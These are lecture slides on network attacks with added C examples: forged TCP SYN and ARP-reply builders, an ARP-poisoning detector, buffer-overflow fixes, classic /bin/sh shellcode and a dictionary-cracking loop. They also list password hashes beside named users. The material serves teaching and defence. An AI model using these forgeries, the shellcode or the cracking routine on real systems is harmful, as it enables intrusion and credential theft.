
Lecture 2: network attack


  1. How-to attack a computer network. Lecture 2. Raja M. Khurram Shahzad
  2. The Internet
     • The elements of the Internet:
       - A lot of hardware and software
       - Hosts, end-systems
       - Millions of interconnected computing devices all over the world (a global network)
       - PCs, workstations, servers…
       - PDAs, phones, TV-boxes…
     • Hosts run network applications: WWW, email, file transfer, remote login, multimedia, …
     [Figure on slides 2-7: an internetwork diagram of hosts (PCs, workstations, servers, mobile devices), routers, a company network, an apartment block, and local, national and international ISPs]
     FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  3. The Internet: Routers
     • Interconnect hosts and networks
     • Switching devices (nodes)
     • Forward data packets between hosts through the networks
     • Store-and-forward technique
     • Other network nodes: bridges, switches, repeaters, amplifiers, … with different functionality and degree of intelligence
  4. The Internet: Protocols
     • All communicating devices on the Internet run protocols
     • Protocols control the sending and receiving of information
       - Ex: TCP, IP, HTTP, FTP…
     • The collection of Internet protocols: TCP/IP
       - Implemented (all or part of it) in all devices on the Internet: hosts, routers…
     • ISPs (Internet Service Providers): sell communication and access services to end users and networks
  5. The Internet
     • A global "network of networks"
       - Both public and private networks of different technologies and performance
     • IP protocol:
       - carries "everything" (applications/services)
       - over "anything" (different network technologies)
       - …half truth!? (high-quality multimedia and real-time applications are still a pain!?)
     • Packet switching: no dedicated resources in the network, …shared!
     • Best-effort service
  6. The Internet: What holds the Internet together?
     • The "glue":
       - Addressing: how to refer to a device
       - Routing: how to get there
       - IP protocol: what to speak to be understood
     • Internet standards: RFC (Request for Comments), IETF (Internet Engineering Task Force)
  7. The Internet: The structure of the Internet
     • Loosely hierarchical
     • Hosts are connected to local ISPs through access networks
       - dial-up phone line: modem, ADSL, ISDN, cable modem…
       - company/campus network
       - leased lines
     • Local ISPs are connected to national ISPs
     • National ISPs are connected to international (global) ISPs
     • The main point: new hosts and networks can be added… without changing the existing implementation of the Internet (should scale!?)
  8. Protocols in the TCP/IP Suite
     [Figure only: the TCP/IP protocol stack]
  10. Information Gathering
     • Find out initial information
       - Open source: general information about a company that anyone can obtain
       - whois (UNIX), Sam Spade (third-party tool for Windows), nslookup
     • Find out the address range of the network
       - ARIN (American Registry for Internet Numbers): whois -h whois.arin.net
       - traceroute
     • Find active machines: ping
  11. Information Gathering cont.
     • Find open ports or access points:
       - Nmap for UNIX
       - ScanPort for Windows
       - War dialers: programs that find modems on a network, e.g. THC-Scan for Windows
     • Figure out the operating system: Queso, Nmap
  12. Information Gathering cont.
     • Map out the network: Cheops, Visual Ping, traceroute
     • Figure out which services are running on each port: default port and OS, telnet to the port and read the banner
     • Vulnerability scanners: programs run against a site that give the attacker a list of vulnerabilities on the target host
       - SAINT
       - Nessus
  13. TCP three-way handshake
     1. Client → Server: SYN with initial sequence number ISNa
     2. Server → Client: SYN with ISNb, ACK of ISNa (acknowledgement number ISNa+1)
     3. Client → Server: ACK of ISNb (acknowledgement number ISNb+1)
     After step 3 both sides consider the connection established.
  14. Types of Nmap scans
     • TCP connect scan: attempts to complete the TCP three-way handshake and set up a connection. Easy to detect: the target application sees a full connection and can log it.
     • TCP SYN scan ("half-open scan"): sends a SYN to each target port. The target answers SYN/ACK if the port is open (RST if closed). The attacker then sends a RST to abort the connection before it is established. Harder to detect: the application never sees a connection, so only packet-level logging on routers, firewalls or an IDS (if enabled) records the attacker's IP.
     • FIN scan: violates the TCP specification by sending an unexpected packet at the start of a connection. The attacker sends a FIN packet; if the target port is closed a RST is sent back, if it is open (or a filter dropped the probe) nothing is sent back. Only works against stacks that follow RFC 793; Windows answers RST either way.
     • ACK scan: sends an ACK packet to the target port. If a RST comes back Nmap classifies the port as "unfiltered", otherwise "filtered". It says whether a stateful filter is in the path, not whether the port is open.
  15. Types of spoofing
     • IP spoofing: an attacker uses the IP address of another computer to acquire information or gain access.
     • Email spoofing: the email looks like it came from John, but in reality John didn't send it; someone impersonating John sent it.
     • Web spoofing: whenever an entity has to be trusted, the opportunity for spoofing arises.
     • Non-technical spoofing: attacks that concentrate on compromising the human element of a company, done through social engineering techniques.
  16. IP Spoofing
     • The intruder sends messages to a computer with a source IP address indicating that the message is coming from a trusted host.
     • A hacker must find the IP address of a trusted host and then modify the packet headers so that the packets appear to come from that host.
     [Figure: the attacker sends a packet with from-address 10.10.20.20 (the spoofed address) to 10.10.5.5; the replies are sent back to John, the real owner of 10.10.20.20, not to the attacker]
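     The SYN probe of the half-open scan on slide 14 and the forged source address on slide 16 are the same handful of header fields, so one added example serves both. This is example code written for this transcript, not the lecture's: it builds the IPv4 and TCP headers of a SYN probe with whatever source address the caller claims, verifies the checksums the way a receiving stack would, and classifies replies the way Nmap's SYN, FIN and ACK scans do. The addresses 10.10.20.20 and 10.10.5.5 are taken from the spoofing slide; the ports, the ISN and the three-valued reply model are assumptions. Nothing is sent: that would need a raw socket and root, and the point is the header, not the transmission. The same header with randomised source addresses is the SYN flood listed on slide 19, and the reason its SYN/ACKs land on innocent hosts.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define TCP_FIN 0x01
#define TCP_SYN 0x02
#define TCP_RST 0x04
#define TCP_ACK 0x10

/* RFC 1071 ones-complement sum of 16-bit big-endian words; an odd trailing
 * byte is padded with zero. Used for both the IP and the TCP checksum. */
static uint32_t sum_words(const uint8_t *p, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)p[i] << 8) | p[i + 1];
    if (len & 1)
        sum += (uint32_t)p[len - 1] << 8;
    return sum;
}

/* Fold the carries back into 16 bits and complement: the value that goes in
 * the header. Over a valid header (checksum field included) it returns 0. */
static uint16_t fold(uint32_t sum)
{
    while (sum >> 16)
        sum = (sum & 0xffffu) + (sum >> 16);
    return (uint16_t)~sum;
}

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }

/* 20-byte IPv4 header. src is whatever the caller claims: IP spoofing is
 * nothing more than writing a trusted host's address into bytes 12-15. */
void build_ipv4_header(uint8_t out[20], const uint8_t src[4], const uint8_t dst[4],
                       uint16_t total_len)
{
    memset(out, 0, 20);
    out[0] = 0x45;                  /* version 4, header length 5 words */
    put16(out + 2, total_len);      /* IP header + TCP segment */
    put16(out + 6, 0x4000);         /* DF set, fragment offset 0 */
    out[8] = 64;                    /* TTL */
    out[9] = 6;                     /* protocol: TCP */
    memcpy(out + 12, src, 4);
    memcpy(out + 16, dst, 4);
    put16(out + 10, fold(sum_words(out, 20)));
}

/* The TCP checksum also covers a pseudo-header (src, dst, zero, protocol,
 * TCP length), so a forged source has to be consistent in both places. */
static uint32_t tcp_pseudo_sum(const uint8_t src[4], const uint8_t dst[4], uint16_t tcp_len)
{
    uint8_t pseudo[12] = {0};
    memcpy(pseudo, src, 4);
    memcpy(pseudo + 4, dst, 4);
    pseudo[9] = 6;
    put16(pseudo + 10, tcp_len);
    return sum_words(pseudo, 12);
}

/* 20-byte TCP header, no options, no payload: exactly what a SYN probe is. */
void build_tcp_header(uint8_t out[20], const uint8_t src[4], const uint8_t dst[4],
                      uint16_t sport, uint16_t dport, uint32_t seq, uint8_t flags)
{
    memset(out, 0, 20);
    put16(out, sport);
    put16(out + 2, dport);
    put32(out + 4, seq);            /* our ISN (ISNa on the handshake slide) */
    out[12] = 5 << 4;               /* data offset: 5 words */
    out[13] = flags;
    put16(out + 14, 1024);          /* advertised window */
    put16(out + 16, fold(tcp_pseudo_sum(src, dst, 20) + sum_words(out, 20)));
}

/* What a receiving stack checks before it even looks at the flags. */
int ipv4_checksum_ok(const uint8_t hdr[20]) { return fold(sum_words(hdr, 20)) == 0; }
int tcp_checksum_ok(const uint8_t ip[20], const uint8_t tcp[20])
{
    return fold(tcp_pseudo_sum(ip + 12, ip + 16, 20) + sum_words(tcp, 20)) == 0;
}

enum scan_type  { SCAN_SYN, SCAN_FIN, SCAN_ACK };
enum reply_kind { REPLY_NONE, REPLY_SYNACK, REPLY_RST };
enum port_state { PORT_OPEN, PORT_CLOSED, PORT_FILTERED, PORT_UNFILTERED, PORT_OPEN_OR_FILTERED };

/* Nmap's reading of the reply. A SYN/ACK to a SYN probe is answered with a
 * RST so the connection never reaches the application (the "half-open" part);
 * silence after a FIN is ambiguous, which the slide's plain "open" glosses over. */
enum port_state classify(enum scan_type scan, enum reply_kind reply)
{
    switch (scan) {
    case SCAN_SYN: return reply == REPLY_SYNACK ? PORT_OPEN
                        : reply == REPLY_RST    ? PORT_CLOSED : PORT_FILTERED;
    case SCAN_FIN: return reply == REPLY_RST ? PORT_CLOSED : PORT_OPEN_OR_FILTERED;
    case SCAN_ACK: return reply == REPLY_RST ? PORT_UNFILTERED : PORT_FILTERED;
    }
    return PORT_FILTERED;
}
```

     Both checksums have to be recomputed after the source address is forged; a spoofing tool that only patches bytes 12-15 produces packets every router and host silently drops, which is the first thing to check when a replayed or forged segment gets no reaction at all.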
  17. Denial of Service Attack
     • DoS: a type of attack on a network designed to bring the network to its knees, by flooding it with useless traffic or by crashing it.
     • Two general types of DoS attacks:
       1. Crashing a system or a network: the attacker sends the victim data or packets it is not expecting. This requires little effort to perform, but human interaction to fix (the system has to be restarted or patched).
       2. Flooding the system or network with so much information that it cannot respond: this requires more effort from the attacker, but recovering requires minimal human intervention (service returns once the flood stops).
  18. Distributed Denial of Service Attack
     • DDoS: several machines are coordinated to launch an attack against a target machine or network at the same time.
     [Figure: the attacker controls systems in China, the USA, Iran and Europe, which all send traffic to the victim]
  19. DoS (examples)
     • Ping of Death
     • SSPing
     • Land
     • Smurf
     • WinNuke
     • CPU Hog
     • SYN flood
  20. Buffer overflow

       #include <stdio.h>
       #include <string.h>

       void sample_function(char *string)
       {
           char buffer[16];             /* local buffer can hold 16 characters */
           strcpy(buffer, string);      /* strcpy loads characters into buffer until it finds the end of the string */
           return;
       }

       int main(void)
       {
           char big_buffer[256];        /* create a buffer that can hold 256 characters */
           int i;
           for (i = 0; i < 255; i++) {
               big_buffer[i] = 'A';     /* shove the character A into the buffer 255 times */
           }
           big_buffer[255] = '\0';      /* terminate the string so strcpy stops after 255 bytes */
           sample_function(big_buffer); /* send big_buffer to sample_function: 255 bytes into a 16-byte buffer */
           return 0;
       }
  21. Buffer Overflow Attack
     • A buffer overflow attack is when an attacker stores more data in a buffer than it was sized to hold.
     • Many of the newest exploits (at the time of the lecture) are based on buffer overflows.
     • Takes advantage of applications that do not adequately check the length of their input before copying it into a fixed-size buffer.
     • Can attack all three areas of security:
       1. Availability (crash the process)
       2. Integrity (overwrite data or control flow)
       3. Confidentiality (run attacker-supplied code that reads data)
  22. How does it work?
     [Figure: stack layout with the bottom of memory at the top of the picture and the top of memory at the bottom; the fill direction runs from the buffer towards higher addresses. Before: buffer, saved frame pointer, return pointer, function call arguments. After the overflow: the buffer is overwritten with machine code (instructions for execv /bin/sh), the saved frame pointer is clobbered, the return pointer is overwritten with a new pointer to the exec code, the arguments are unchanged. When the function returns, execution continues in the injected code.]
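     The vulnerable function from slide 20 next to two bounded rewrites, as an added example (written for this transcript, not the lecture's code). BUF_SIZE, the function names and the return conventions are assumptions; the bug itself is the slide's.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 16

/* Slide 20's function, unchanged except for the prototype: strcpy copies
 * until the first NUL, so a 255-byte argument runs past buffer into the
 * saved frame pointer and return address shown on slide 22. Kept only to be
 * compared with the fixed versions; never call it on untrusted input. */
void sample_function(const char *string)
{
    char buffer[BUF_SIZE];
    strcpy(buffer, string);             /* no bound: stack smash on long input */
}

/* Fix 1: fail closed. memchr looks for the NUL within BUF_SIZE bytes, so an
 * argument that would not fit is rejected before a single byte is copied.
 * Returns the number of characters copied, or -1 if the input is too long.
 * (strncpy is not a fix: with a long source it leaves buffer unterminated.) */
int sample_function_checked(const char *string)
{
    char buffer[BUF_SIZE];
    const char *nul = memchr(string, '\0', BUF_SIZE);
    if (nul == NULL)
        return -1;                      /* no terminator within BUF_SIZE: reject */
    memcpy(buffer, string, (size_t)(nul - string) + 1);
    return (int)strlen(buffer);
}

/* Fix 2: truncate, when that is acceptable for the data. snprintf never
 * writes past dstsz and always NUL-terminates; its return value is the length
 * the full string would have had, so truncation is detectable rather than
 * silent. Returns 1 if the copy was truncated, 0 otherwise. */
int copy_truncating(char *dst, size_t dstsz, const char *src)
{
    int needed = snprintf(dst, dstsz, "%s", src);
    return needed < 0 || (size_t)needed >= dstsz;
}

/* Slide 20's driver pointed at the checked version: the 255 'A's that smash
 * sample_function are simply refused. Returns -1. */
int demo(void)
{
    char big_buffer[256];
    memset(big_buffer, 'A', 255);
    big_buffer[255] = '\0';
    return sample_function_checked(big_buffer);
}
```

     Which fix is right depends on the data: a filename or a username that does not fit is an error and should be refused (fix 1); a log message may be cut short as long as the caller learns that it was (fix 2). Silent truncation is its own bug class, which is why copy_truncating reports it.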
  23. Example
     • Some different buffer overflow attacks:
       - NetMeeting buffer overflow
       - Outlook buffer overflow
       - Linuxconf buffer overflow
       - IIS 4.0/5.0 Phone Book Server buffer overflow
     • Shellcode test program (the classic 32-bit x86 Linux execve("/bin/sh") shellcode; it assumes a 32-bit frame layout, an executable stack and no stack protector, so it will not run as-is on a modern system):

       char shellcode[] =
           "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
           "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
           "\x80\xe8\xdc\xff\xff\xff/bin/sh";

       int main(void)
       {
           int *ret;
           ret = (int *)&ret + 2;     /* points at main's saved return address (32-bit frame layout) */
           (*ret) = (int)shellcode;   /* overwrite it so "returning" from main jumps into the shellcode */
           return 0;
       }
  24. Sniffing
     • A program that gathers traffic from the local network
     • Used by both attackers and network administrators
     • Gathers packets at the data link layer
     • An attacker must have an account (with enough privilege to put the interface into promiscuous mode) on a machine on the segment in order to run the sniffer program
     • Sniffing tools available: tcpdump, windump, Wireshark (formerly Ethereal), dsniff
  25. Passive Sniffing
     [Figure: a hub repeats every packet out of every port, so a sniffer on any port sees all traffic on the segment]
  26. Active Sniffing
     • Two methods for sniffing data from a switched LAN:
       1. MAC flooding
       2. Spoofed ARP messages
     [Figure: hosts on a switch, the default router behind it, and the Internet; the switch only delivers a packet to the port of its destination MAC, so a passive sniffer sees nothing]
  27. Spoofed ARP Message
     1. The attacker configures IP forwarding so that packets it receives are sent on to the default router.
     2. The attacker sends a fake ARP response to the victim that remaps the default router's IP address to the attacker's MAC address.
     3. Based on the poisoned ARP table, the victim's traffic destined for the outside world is really sent to the attacker's MAC address; the switch delivers it to the attacker's port.
     4. The attacker sniffs the traffic.
     5. Packets are forwarded from the attacker's machine to the actual default router for delivery to the outside world, so the victim notices nothing.
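     Step 2 of slide 27 as bytes on the wire, plus the check that catches it, as an added example (written for this transcript, not the lecture's code). The frame builder produces the forged reply; the parser and arp_reply_is_poisoned are what the victim, or an arpwatch-style monitor on the switch's mirror port, would run against every ARP reply it sees. All MAC and IP addresses are constructed for the example; the gateway binding table is an assumption about what the monitor knows in advance.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FRAME_LEN 42            /* 14-byte Ethernet header + 28-byte ARP packet */
#define ARP_REPLY 2

struct arp_msg {
    uint8_t  eth_src[6];        /* Ethernet source, kept for cross-checking */
    uint16_t opcode;
    uint8_t  sender_mac[6], sender_ip[4];
    uint8_t  target_mac[6], target_ip[4];
};

/* The forged reply "claimed_ip is-at claimed_mac", sent straight to the
 * victim. Nobody asked; ARP has no authentication and most stacks update
 * their cache on an unsolicited reply anyway. */
void build_arp_reply(uint8_t out[FRAME_LEN], const uint8_t victim_mac[6],
                     const uint8_t victim_ip[4], const uint8_t claimed_ip[4],
                     const uint8_t claimed_mac[6])
{
    memset(out, 0, FRAME_LEN);
    memcpy(out, victim_mac, 6);            /* Ethernet destination */
    memcpy(out + 6, claimed_mac, 6);       /* Ethernet source: the attacker's NIC */
    out[12] = 0x08; out[13] = 0x06;        /* EtherType: ARP */
    out[15] = 1;                           /* HTYPE: Ethernet */
    out[16] = 0x08;                        /* PTYPE: IPv4 (0x0800) */
    out[18] = 6; out[19] = 4;              /* HLEN, PLEN */
    out[21] = ARP_REPLY;                   /* opcode */
    memcpy(out + 22, claimed_mac, 6);      /* sender MAC: the attacker */
    memcpy(out + 28, claimed_ip, 4);       /* sender IP: the router's address */
    memcpy(out + 32, victim_mac, 6);
    memcpy(out + 38, victim_ip, 4);
}

/* Decode an Ethernet/IPv4 ARP frame; returns 0 for anything else. */
int parse_arp(const uint8_t *frame, size_t len, struct arp_msg *m)
{
    if (len < FRAME_LEN || frame[12] != 0x08 || frame[13] != 0x06) return 0;
    if (frame[14] != 0 || frame[15] != 1 || frame[16] != 0x08 || frame[17] != 0) return 0;
    if (frame[18] != 6 || frame[19] != 4) return 0;
    memcpy(m->eth_src, frame + 6, 6);
    m->opcode = (uint16_t)((frame[20] << 8) | frame[21]);
    memcpy(m->sender_mac, frame + 22, 6);
    memcpy(m->sender_ip,  frame + 28, 4);
    memcpy(m->target_mac, frame + 32, 6);
    memcpy(m->target_ip,  frame + 38, 4);
    return 1;
}

struct binding { uint8_t ip[4]; uint8_t mac[6]; };

/* A reply is flagged when its sender IP belongs to a protected host (the
 * gateway at minimum) but the sender MAC is not the one on record, or when
 * the ARP sender MAC disagrees with the Ethernet source, which an ordinary
 * host never does. Returns 1 = poisoned, 0 = consistent with what we know. */
int arp_reply_is_poisoned(const struct arp_msg *m, const struct binding *known, size_t n)
{
    if (m->opcode != ARP_REPLY) return 0;
    if (memcmp(m->eth_src, m->sender_mac, 6) != 0) return 1;
    for (size_t i = 0; i < n; i++)
        if (memcmp(known[i].ip, m->sender_ip, 4) == 0)
            return memcmp(known[i].mac, m->sender_mac, 6) != 0;
    return 0;   /* IP not protected: nothing to compare against */
}
```

     The static table is the whole defence: ARP itself gives the monitor no way to tell the real router from the attacker, so the gateway's MAC has to be known out of band. Switch features that do the same job in hardware (dynamic ARP inspection keyed off DHCP snooping) rely on exactly this kind of binding table.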
  28. Island Hopping Attack
  29. Passwords
     • Most common weaknesses in a company:
       1. Weak passwords
       2. Uncontrolled modems on the network
     • Most systems and software ship with default passwords!
     • Characteristics of a strong password (policy):
       - Changes every 45 days
       - Minimum length of 10 characters
       - Contains at least one letter, one digit and one special character
       - Cannot contain dictionary words
       - Cannot reuse the previous five passwords
       - Minimum password age of 10 days
       - After 5 failed logon attempts the account is locked for several hours
  30. Passwords cont.
     • The system maintains a file that associates a password with each authorised user.
     • The password file can be protected with:
       - One-way encryption (hashing): the file holds a value the password can be checked against but not recovered from
       - Access control: only privileged users can read the file
     • Techniques for guessing passwords:
       - Try default passwords.
       - Try all short words, 1 to 3 characters long.
       - Try all the words in an electronic dictionary (60,000).
       - Collect information about the user's hobbies, family names, birthday, etc.
       - Try the user's phone number, social security number, street address, etc.
       - Try all license plate numbers (e.g. MUP103).
       - Use a Trojan horse.
       - Tap the line between a remote user and the host system.
  31. UNIX passwords
     • Stored in the file /etc/passwd, which is world readable (any user on the system can read it, e.g. with more /etc/passwd):
         username:password:UID:GID:full name:home directory:shell
         sch:OZFGkH258h8yg:1013:10:Stefan Chevul:/home/sch/:/bin/csh
     • Later UNIX versions split the passwd file into two files. /etc/passwd still exists and contains everything except the encrypted passwords; those are stored in /etc/shadow, readable only by root:
         username:password:last:min:max:warning:expire:disable
         sch:OZFGkH258h8yg:::::::
  32. ypcat passwd (the NIS passwd map, encrypted passwords included, as any NIS client can dump it)
         gymsjo:PgiEmZuEHpmY2:3227:3200:STEFAN JOHANSSON:/home/dogmatix/gym/gymsjo:/usr/local/bin/tcsh
         frpe03:EoFPa/t0McqN6:470078:20031:FREDRIK PERSSON:/home/dogmatix/students/20031/frpe03:/usr/local/bin/tcsh
         etmf01:Ck34HVjHPI3gQ:740030:20011:Etienne Mfoumou:/home/dogmatix/students/20011/etmf01:/usr/local/bin/tcsh
         rope05:i/mTnW1jL7vmM:490146:20051:ROBIN PERSSON:/home/obelix/students/20051/rope05:/usr/local/bin/tcsh
         nasc04:HfcXJTuIB7Bh2:500001:20041:Nadzida Saric:/home/obelix/students/20041/nasc04:/usr/local/bin/tcsh
  33. cat passwd (with shadow passwords in use, the password field holds only an x)
         root:x:0:0:Super-User:/:/sbin/sh
         daemon:x:1:1::/:
         bin:x:2:2::/usr/bin:
         sys:x:3:3::/:
         adm:x:4:4:Admin:/var/adm:
         lp:x:71:8:Line Printer Admin:/usr/spool/lp:
         uucp:x:5:5:uucp Admin:/usr/lib/uucp:
         smmsp:x:25:25:SendMail Message Submission Program:/:
         nobody:x:60001:60001:Nobody:/:
         noaccess:x:60002:60002:No Access User:/:
  34. Salt
     • The salt serves three purposes:
       - Prevents duplicate passwords from showing up as duplicate entries: two users with the same password get different stored values.
       - Effectively increases the length of the password: an attacker who precomputes hashes has to do so once per possible salt (4096 with a 12-bit salt).
       - Prevents the use of off-the-shelf hardware implementations of DES, because the salt perturbs the expansion function.
  35. UNIX Password Scheme I
     [Figure: (a) loading a new password. The password (8 characters, 56 bits) and a 12-bit salt go into crypt(3), which computes E(pwd, [salt, 0]): DES keyed by the password, modified by the salt, applied to a block of zeros. The password file stores the user id, the salt and the 11-character result.]
  36. UNIX Password Scheme II
     [Figure only]
  37. Password cracking
     • Password cracking = guessing someone's password from the encrypted (hashed) password.
     • General algorithm used for automated password cracking:
       1. Find valid user IDs
       2. Find the encryption algorithm used
       3. Obtain the encrypted passwords
       4. Create a list of possible passwords
       5. Encrypt each word (under each user's salt)
       6. See if there is a match for each user ID
       7. Repeat steps 4 through 6 with a new list of candidates
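     An added example that ties slides 31 to 37 together (written for this transcript, not the lecture's code): parse a passwd-style line, apply a salted one-way function, and run steps 4 to 6 of the cracking algorithm against the result. The real crypt(3) of slide 35 is 25 rounds of DES keyed by the password and perturbed by the 12-bit salt; to stay self-contained without libcrypt, this uses a stand-in (FNV-1a over salt and password, rendered in crypt's alphabet) that has crypt's 13-character shape and none of its properties. The stand-in, the wordlist and the account built in demo() are constructed for the example; the sample passwd line is the one from slide 31.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SALT_LEN 2
#define HASH_LEN 13          /* crypt(3) output: 2 salt characters + 11 hash characters */

struct pw_entry {
    char     user[64];
    char     hash[HASH_LEN + 1];
    unsigned uid, gid;
    char     shell[64];
};

/* Split a colon-separated line into at most n fields; empty fields (as in
 * "daemon:x:1:1::/:") are legal and come back as empty strings. */
static int split_colon(const char *line, char fields[][64], int n)
{
    int k = 0;
    while (k < n) {
        const char *colon = strchr(line, ':');
        size_t len = colon ? (size_t)(colon - line) : strcspn(line, "\n");
        if (len > 63) len = 63;
        memcpy(fields[k], line, len);
        fields[k][len] = '\0';
        k++;
        if (!colon) break;
        line = colon + 1;
    }
    return k;
}

/* passwd line: user:password:UID:GID:full name:home:shell (slide 31). */
int parse_passwd_line(const char *line, struct pw_entry *e)
{
    char f[7][64];
    if (split_colon(line, f, 7) != 7) return 0;
    strcpy(e->user, f[0]);
    strncpy(e->hash, f[1], HASH_LEN);
    e->hash[HASH_LEN] = '\0';
    e->uid = (unsigned)strtoul(f[2], NULL, 10);
    e->gid = (unsigned)strtoul(f[3], NULL, 10);
    strcpy(e->shell, f[6]);
    return 1;
}

/* Stand-in for crypt(3): 64-bit FNV-1a over salt||password, printed in the
 * crypt alphabet with the salt in front. Fast and unkeyed, i.e. NOT a
 * password hash; it only lets the loop below run without libcrypt. */
static const char ITOA64[] =
    "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

void toy_crypt(const char *password, const char *salt, char out[HASH_LEN + 1])
{
    uint64_t h = 0xcbf29ce484222325ull;
    for (int i = 0; i < SALT_LEN; i++) { h ^= (uint8_t)salt[i]; h *= 0x100000001b3ull; }
    for (const char *p = password; *p; p++) { h ^= (uint8_t)*p; h *= 0x100000001b3ull; }
    out[0] = salt[0];
    out[1] = salt[1];
    for (int i = 2; i < HASH_LEN; i++) { out[i] = ITOA64[h & 63]; h >>= 6; }
    out[HASH_LEN] = '\0';
}

/* Steps 4-6 of slide 37 for one account: the salt is read off the stored
 * hash, every candidate is hashed under it and compared. Returns the index
 * of the matching word or -1. Because the salt differs per user the whole
 * wordlist is re-hashed for every account; without salt one pass would
 * crack every account sharing a guessed password. */
int crack_entry(const struct pw_entry *e, const char *const *words, int nwords)
{
    char candidate[HASH_LEN + 1];
    for (int i = 0; i < nwords; i++) {
        toy_crypt(words[i], e->hash, candidate);   /* first two chars of hash = salt */
        if (strcmp(candidate, e->hash) == 0) return i;
    }
    return -1;
}

/* A constructed account whose password is in the wordlist: returns 2. */
int demo(void)
{
    static const char *const words[] = { "password", "letmein", "secret", "qwerty" };
    char line[256], hash[HASH_LEN + 1];
    struct pw_entry e;
    toy_crypt("secret", "OZ", hash);       /* what passwd(1) would have stored */
    snprintf(line, sizeof line, "sch:%s:1013:10:Stefan Chevul:/home/sch/:/bin/csh", hash);
    if (!parse_passwd_line(line, &e)) return -1;
    return crack_entry(&e, words, 4);
}
```

     With crypt(3) in place of toy_crypt, this loop is Crack and John the Ripper in miniature; the two things that change the cost are the size of the candidate list (dictionary versus brute force) and the per-guess cost of the hash, which is the whole argument for a slow, salted function over DES.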
  38. Why is password cracking important?
     • From a security standpoint, password cracking can help you build and maintain a more secure system.
     • Reasons why password cracking is useful:
       - To audit the strength of passwords
       - To recover forgotten / unknown passwords
       - To migrate users
       - To use as a checks-and-balances system
     • Main types of password cracking attacks: dictionary attacks, brute force attacks, hybrid attacks
  39. Types of password attacks

                                  Dictionary attack     Brute force attack     Hybrid attack
     Speed of the attack          Fast                  Slow                   Medium
     Amount of passwords cracked  Finds only words      Finds every password   Finds only passwords that have a dictionary word as the base
  40. Password cracking programs
     • NT password cracking programs: L0phtCrack, NTSweep, NTCrack, pwdump2
     • UNIX password crackers: Crack, John the Ripper, XIT, Slurpie
  41. Covering the Tracks
     • After an attacker has gained access and accomplished what he wanted, one of the last steps is covering his tracks: hiding the evidence that he was ever there.
     • There are 4 main areas an attacker is concerned with:
       1. Log files
       2. File information (timestamps, sizes, checksums of modified files)
       3. Additional files (tools and backdoors left on the host)
       4. Network traffic